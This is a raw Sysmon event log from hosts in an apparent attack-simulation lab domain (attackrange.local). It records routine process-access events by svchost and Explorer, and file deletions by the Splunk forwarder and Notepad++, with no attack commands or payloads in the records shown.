08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.365{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.365{466BC892-32D3-60E8-770B-00000000CF01}63569384C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.365{466BC892-32D3-60E8-770B-00000000CF01}63569384C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.832{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=670E80EF7FE1CB86A3BBA4250686552C,SHA256=5C0ADACA0B0D30C51FB5BD6DBEBA27FE6769768FA548E1BE2E43D44709D5A0C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810378Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:36.048{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=421FEFE1AA11A648E82E36DEBD3260F4,SHA256=7776820AA6B787A9C4CF96E1F1AC7DC4B19D550DE2C4612C834810BFEB4CBCD8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.265{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001054578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.265{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001054577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.265{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.249{466BC892-32D3-60E8-770B-00000000CF01}63563784C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.249{466BC892-32D3-60E8-770B-00000000CF01}63563784C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.249{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.249{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.249{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:37.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=932C784C9958B8E057C1DC6E176C6710,SHA256=4BB5F7A37836D793C0E19B382ED55652CD18BFFCA2755FDF14D27C6A6137B6C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810379Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:37.048{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F42B345919A34FF454184CF439173839,SHA256=071DDC7D1BFD08B738EA86695BD9931985C4A204A9CA28EE83F34A10A6A32672,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:37.133{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_080734MD5=DA844B439CDDBAF32252CA567375723D,SHA256=E320A8D07D726007039F08B51C9F062E31DA98D37745B5619B1E7AF0A0D52D95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:37.111{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Program Files\ansible\AttackRangeSysmon.xmlMD5=7C0C4B52054FD15E78DB8A40B9CA49D2,SHA256=B0C36ACDF22162AD79D07D67E63140DF7514E548DA320BC04E293C986A9BC194,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:38.894{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:38.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8252ED95F461AB092E09E2DDE2BBD824,SHA256=1F7CC70538CECA375F1E3E8A2DACE8683218F7F5EAAE7FD98BE5EFC71707D0C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810380Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:38.048{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=962284FFFD0583F7099406E88C832450,SHA256=B07AF814AFC327AC6ACA7D96992C23279848C240A2A47A02C9C8FAD3DCA23C22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:38.679{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=AD1CDE8ACCF2BCDBBDF188A99A259C19,SHA256=EC4F74A53380E0B3B4FEE4CF5734E9183EFB0B17BA97163D9023A0FE7E8962D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:39.908{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 